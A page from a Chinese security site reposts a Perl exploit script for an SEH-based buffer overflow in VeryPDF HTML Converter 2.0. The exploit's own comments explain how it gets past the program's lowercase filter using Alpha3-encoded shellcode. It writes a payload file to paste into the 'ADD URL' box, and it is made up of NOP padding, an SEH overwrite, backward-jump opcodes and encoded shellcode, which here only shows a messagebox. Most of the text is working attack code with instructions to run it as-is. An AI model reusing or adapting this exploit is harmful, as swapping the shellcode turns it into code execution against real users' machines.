首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
VeryPDF HTML Converter 2.0 - SEH/ToLower() Bypass Buffer Overflow
来源:c0d3rc0rl3y@gmail.com 作者:Corley 发布时间:2015-09-08  
#*************************************************************************************************************
#
# Exploit Title: VeryPDF HTML Converter v2.0 SEH/ToLower() Bypass Buffer Overflow
# Date: 9-6-2015
# Target tested: Windows 7 (x86/x64)
# Software Link: http://www.verypdf.com/htmltools/winhtmltools.exe
# Exploit Author: Robbie Corley
# Contact: c0d3rc0rl3y@gmail.com
# Website:
# CVE:
# Category: Local Exploit
#
# Description:
# The [ADD URL] feature is vulnerable to an SEH based buffer overflow. 
# This can be exploited by constructing a payload of ascii characters that contain our payload
# and pasting it into the textbox.  The program's textbox converts ALL pasted data to lowercase so I
# took advantage of the wonderful Alpha3 tool to encode the shellcode into a numerical format to bypass the filter.
#
# I also used a null terminated SEH address to gain universal exploitation across all current Windows OSes.
# So, I took a rather unconventional approach and placed the shellcode in the buffer itself since it could
# not execute after the buffer (after SEH) due to the null byte cutting off the remaining pieces of the string.
#
# Instructions: 
# Run this exploit as-is, open the created 'sploitit.txt' file, copy and paste into the [ADD URL] textbox
# Hit [OK] and enjoy your soon-to-follow messagebox!
#
#**************************************************************************************************************
 
# placing shellcode in top of buffer padding since we have a null terminated string
$zero = pack("C*", 0xD);
my $buff = "\x90" x 2700; #NSEH is at 3704.  we start low to give room for everything else.
my $seh = "\x05\x25\x40".$zero;
$nseh = "\xeb\xe1\x90\x90";  # jump backwards to shellcode ;)
$filler="\x90" x 122;
 
#0018E924   66:05 9903       ADD AX,399
#0018E928   04 29            ADD AX,29
#0018E92A   04 03            ADD AX,3
#10 bytes
$encodersetup="\x66\x05\x99\x03\x04\x24\x04\x10";
$encodersetup .= "\x8b\xc8";
 
#python ALPHA3.py x86 lowercase ECX --input="c:\shellmsg.bin"
#Windows MessageBox contructed using Metasploit & Alpha3
#637 bytes
$shellcode=
"j314d34djq34djk34d1411q11q7j314d34dj234dkmq502dq5o0d15upj98xmfod68kfnen488m56kj4".
"0ek53knd00192g0dl428l0okn5503cnk6b5bm844nb4k5x70o0mkoc60l9l03c3fje7embj4k9lx1x9k".
"10j2j2ngne63og74ob708do87cm3jxm9o3j05x0k628x50910b8e5049o84e01oxk39d5841k8jej8kk".
"nxo4ogo5l07129215f7f3fo0989459kxnb2b78jg5gn8m4l21e6g823x5x680c4b91n0ox1370n0l1l4".
"10jfmk941b9f1k09n57g281gk414nb4kle92542994293e1dnf224e7b920g0b7go3735cm87f0d4c8f".
"9d1d3c3b24obn8ob498k1d0e7bke846elc507594jb2xjb9e6d3g8b7gl9459819jclb5b9bjg1cn935".
"6x7x8x7844oe231809742494ndo43d040cn13fmb43k0611f0952kk3g32l54fkd0b6xm15xjkj3636k".
"nb9e1dj2n16e3b9565lk6f2bmb7b5e0c0d29l13ekbk94842kd51n17d327000803223ncm9101gl";
 
$smallpads = "\x90" x 347;
 
##section 2 | total 10 bytes
##Perform a long jump backwards up the stack to reach our payload ;)
$jumpcode="\x8B\xC1\x90\x90"; #MOV EAX,ECX
$jumpcode .= "\x66\x05\x55\x05"; # ADD AX,555 --> We do AX so we don't have to worry about NULLS ;)
$jumpcode .= "\xFF\xe0"; #JMP EAX
 
open(myfile,'>sploitit.txt');
print myfile $buff.$encodersetup.$shellcode.$smallpads.$jumpcode.$nseh.$seh;
close (myfile);
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Disconnect.me Mac OS X Client
·Endian Firewall Proxy Password
·AutoCAD DWG and DXF To PDF Con
·PHP SplDoublyLinkedList unseri
·Windows Registry Only Persiste
·PHP GMP unserialize() Use-Afte
·Windows Escalate UAC Protectio
·PHP SplObjectStorage unseriali
·SphereFTP Server 2.0 - Crash P
·PHP Session Deserializer Use-A
·XGI Windows VGA Display Manage
·PHP unserialize() Use-After-Fr
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved